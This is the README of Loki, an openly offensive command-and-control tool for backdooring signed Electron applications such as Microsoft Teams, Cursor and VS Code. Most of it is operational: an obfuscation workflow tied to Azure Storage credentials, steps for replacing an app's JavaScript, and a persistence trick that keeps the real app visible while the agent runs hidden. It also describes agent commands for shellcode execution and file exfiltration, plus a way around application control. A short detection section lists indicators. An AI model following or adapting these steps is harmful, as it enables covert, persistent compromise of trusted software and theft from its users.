Stage 1 C2 for backdooring Electron applications to bypass application controls. This technique abuses the trust of signed vulnerable Electron applications to gain execution on a target system.
| Name | Contributions |
|---|---|
| Bobby Cooke | Creator & Maintainer |
| Dylan Tran | Creator |
| Ellis Springe | Alpha Tester |
| Simon Exley | Video Creator |
| Clinton Elves | Video Creator |
| John Hammond | Video Creator & Vulnerable App Discovery |
Check out Simon Exley & Clinton Elves video on getting up and running with Loki C2 by backdooring VS Code! π₯·π₯πͺπ§ββοΈ
At runtime, an Electron application reads JavaScript files, interprets their code and executes them within the Electron process. The animation below demonstrates how the Microsoft Teams Electron application reads a JavaScript file at runtime, which then uses the Node.JS child_process module to execute whoami.exe.
Since Electron applications execute JavaScript at runtime, modifying these JavaScript files allows attackers to inject arbitrary Node.js code into the Electron process. By leveraging Node.js and Chromium APIs, JavaScript code can interact with the operating system.
Loki was designed to backdoor Electron applications by replacing the applications JavaScript files with the Loki Command & Control JavaScript files.
For more information see my blog post about backdooring Electron applications with Loki C2:
- Uses Azure Storage Blobs for C2 channel.
- All C2 messages are AES encrypted with dynamically created AES keys.
- SAS Token to protect C2 storage account.
- Proxy-aware agent.
- Uses Chromium renderer child processes for agent, shellcode execution, and assembly fork-n-run style execution, so inherits proxy-aware capabilities of Chromium.
- Teamserver-less
- Unlike traditional C2's where agents send messages to a Teamserver, there is no Teamserver.
- The GUI client & agents both checkin to the same data-store for commands and output.
- Hidden window and does not show in taskbar after execution, Loki process is ran in background.
- Can stay alive for months calling back until the computer is restarted.
- Robust exception handling in kernel process, if agent child process dies from an exception or bug then kernel spawns a new agent process.
All agent commands are written in native Node.JS and do not require additional dependecies or library load events. With the exception of the scexec and assembly commands which do a library load on keytar.node and assembly.node
- All commands accept paths using
/,\in paths will not work.
| Command | Description |
|---|---|
help |
Display help. Usage: help or help scan |
pwd |
Print working directory |
ls |
File and directory listing |
cat |
Display contents of a file |
env |
Display process environment variables |
spawn |
Spawn a child process |
drives |
List drives |
mv |
Move a file to a new destination |
sleep |
Sleep for seconds with jitter |
cp |
Copy a source file to a destination |
exit-all |
Exits the agent, agent won't callback anymore |
load |
Load a node PE file from disk into the process |
scexec |
Execute shellcode |
assembly |
Execute a .NET assembly and get command output |
upload |
Upload a file from your local operator box to the remote agent box |
download |
Download a file from remote agent box to local operator box |
scan |
Perform TCP network scan across CIDR range with selected ports |
dns |
DNS lookup. Leverages systems DNS configuration |
set |
Set the Node load paths for assembly node and scexec nodes |
- If there are application control rules preventing library loads for the node files you can use the
setcommand to change the load paths forassembly.nodeandscexec.node. - By using
ls,cat,cpandmvyou may be able to enumerate the application control rules to discover a writable directory that is an exclusion. - With this you can put the node files in the exclusion directory and use the
setcommand to change their load path to the exclusion directory to bypass the application control. - For more details on this attack vector see the CRTO2 course by Daniel Duggan (@_RastaMouse)
[04-04-2025 8:50AM MST] advsim$ help set
Set the Node load paths for assembly node and scexec nodes
set scexec_path C:/Users/user/AppData/ExcludedApp/scexec.node
set assembly_path C:/Users/user/AppData/ExcludedApp/assembly.node
[04-04-2025 8:51AM MST] advsim$ set scexec_path C:/Users/user/AppData/ExcludedApp/scexec.node
SCEXEC Node Load Path Set to : C:/Users/user/AppData/ExcludedApp/scexec.node
For more information on Agent features click here
For more information on Client features click here
First you need to identify a vulnerable Electron application which does not do ASAR security integrity checks such as Microsoft Teams. Newer applications may have integrity checks preventing backdooring. Older versions of the target app are more likely to be vulnerable.
| Vulnerable | App Name | EXE Name | Version | Discovery Credit |
|---|---|---|---|---|
| β | Microsoft Teams | Teams.exe |
v1.7.00.13456 | Andrew Kisliakov & mr.d0x |
| β | Cursor | cursor.exe |
John Hammond | |
| β | VS Code | code.exe |
||
| β | Github Desktop | GithubDesktop.exe |
||
| β | 1Password | 1Password.exe |
||
| β | Signal | Signal.exe |
||
| β | Slack | slack.exe |
You don't need to compile the agent when backdooring Electron apps. Just replace the contents of {ELECTRONAPP}/resources/app/ with the Loki agent files.
- Clone this repo and
cdinto it - Install Node.JS
- Install
javascript-obfuscatormodule
npm install --save-dev javascript-obfuscator
- Run
obfuscateAgent.jsscript to create a Loki payload with your Storage Account info
bobby$ node obfuscateAgent.js
[+] Provide Azure storage account information:
- Enter Storage Account : 7f7584ty218ba5dba778.blob.core.windows.net
- Enter SAS Token : se=2025-05-28T23%3A14%3A48Z&sp=rwdlac&spr=https&sv=2022-11-02&ss=b&srt=sco&sig=5MXQzJ6FDZK8yYiBSgJ6FDZKgQzJMXBSgg6qE4ydrJ6FDZKSgg%3D
[+] Configuration:
- Storage Account : 7f7584ty218ba5dba778.blob.core.windows.net
- SAS Token : se=2025-05-28T23%3A14%3A48Z&sp=rwdlac&spr=https&sv=2022-11-02&ss=b&srt=sco&sig=5MXQzJ6FDZK8yYiBSgJ6FDZKgQzJMXBSgg6qE4ydrJ6FDZKSgg%3D
- Meta Container : mllyi2zjmafjm
[+] Updated /Users/bobby/apr2/LokiC2/config.js with storage configuration.
- Enter into the Loki Client UI
Loki Client > Configuration
[+] Modifying PE binaries to have new hashes...
- Payload assembly.node hash : e9d126407264821d3c2d324da0e2d1bc13cbc53e7c56340fe12b07f69b707f02
- Payload keytar.node hash : 292c14ffebd6cae3df99d9fbee525e29a5a704f076b82207eb3e650de45b075d
[+] Payload ready!
- Obfuscated payload in the ./app directory
- Your obfuscated Loki payload is output to
./app/ - Change directory to the
{ELECTRONAPP}/resources/ - Delete everything
- Copy the Loki
./app/folder to{ELECTRONAPP}/resources/app/ - Click the Electron PE file and make sure Loki works
-
Launch the Loki GUI client
-
From the menubar click
Loki Client > Configurationto open the Settings window -
Enter in your Storage Account details and click
Save
-
The agent should now render in the dashboard
-
Click the agent from the dashboard table to open the agent window
-
Test to ensure Loki works properly
The most straightforward way to use Loki is to replace the files in {ELECTRONAPP}/resources/app/ with the Loki files. This hollows out the app, meaning the app wont function normally -- Loki replaced its functionality.
If you really want to keep the Electron application running and have it also deploy Loki in the background all hope is not lost! John Hammond and I figured out a way to keep the real Electron application running. We've added the file you will need to /loki/proxyapp/init.js in this repo.
It is currently setup to work for Cursor, discovered to be vulnerable by John Hammond.
For doing this you will need to:
- Download the Cursor app
- Paste all Loki files except
package.jsontocursor/resources/app/- Don't replace the real
package.json
- Don't replace the real
- Copy
/loki/proxyapp/init.jstocursor/resources/app/ - Modify contents of
cursor/resources/app/package.jaonto:- set
"main":"init.js", - delete
"type":"module", - delete
"private":true,
- set
- With these changes
Cursor.exewill load ininit.json click / execution init.jsreads inpackages.jsoninit.jschanges"main":"init.js",->"main":"main.js",main.jsis Loki
init.jsspawns and disowns a newCursor.exewhich points to Loki- Loki is spawned in the background
init.jsreads inpackages.jsonagaininit.jschanges"main":"main.js",->"main":"./out/main.js",./out/main.js"is the real Cursor application
init.jsspawns and disowns a newCursor.exewhich points to the real Cursor- Real Cursor app is spawned, visible and operates as normal
- When Cursor is exited by the user:
init.jscatches the exitinit.jsreads inpackages.jsonfor a third timeinit.jschanges"main":"./out/main.js",->"main":"init.js",
This way the app is persistently backdoored and operates as normal. If the cursor app is exited loki will continue to run in the background.
I'll make a script to automate this in the future.
These are the compile instructions for building the agents & clients. The instructions cover multiple platforms, including Windows, Linux, and macOS. It is recommended to compile the client on the target platform and architecture.
If you are backdooring an Electron application then you don't need to compile agents.
I do not recommend compiling the agent and using it for operations. Agent compile instructions are for development.
- Review the information provided by MITRE for more details, examples, and information about this TTP :
- Execution of an electron app from a abnormal directory such as
~/Downloads/Teams/Teams.exe - Electron apps beaconing to an Azure Storage Blob
*.blob.core.windows.net - SAS token usage in network traffic
- Electron apps spawning child processes such as
netstat.exeorwhoami.exe - A directory with the name in the Loki
packages.jsonwill be created in~/AppData/Roaming/{NAME}when the Loki JavaScript executes in the Electron process. - This LOLBAS Teams entry covers detections for Electron application backdooring. The detection information has been copied below.
- IOC:
%LOCALAPPDATA%\Microsoft\Teams\current\appdirectory created - IOC:
%LOCALAPPDATA%\Microsoft\Teams\current\app.asarfile created/modified by non-Teams installer/updater
- Dylan Tran (@d_tranman)
- Cocreator of the Loki agent. Created node modules for shellcode and assembly execution.
- Valentina Palmiotti (@chompie1337), Ellis Springe (@knavesec), and Ruben Boonen for their previous internel work on backdooring Electron applications for persistence
- Ruben Boonen
- Andrew Kisliakov
- mr.d0x (@mrd0x) for their prior work about leveraging the Teams Electron application to execute arbitrary Node.JS code and publishing their findings to the LOLBAS project.
- Michael Taggart
- Raphael Mudge for inspiring me to dive deep into red teaming and supporting the release of this tool
- Fletcher Davis
- Pavel Tsakalidis
This project is licensed under the Business Source License 1.1. Non-commercial use is permitted under the terms of the license. Commercial use requires the author's explicit permission. On April 3, 2030, this license will convert to Apache 2.0. See LICENSE for full details.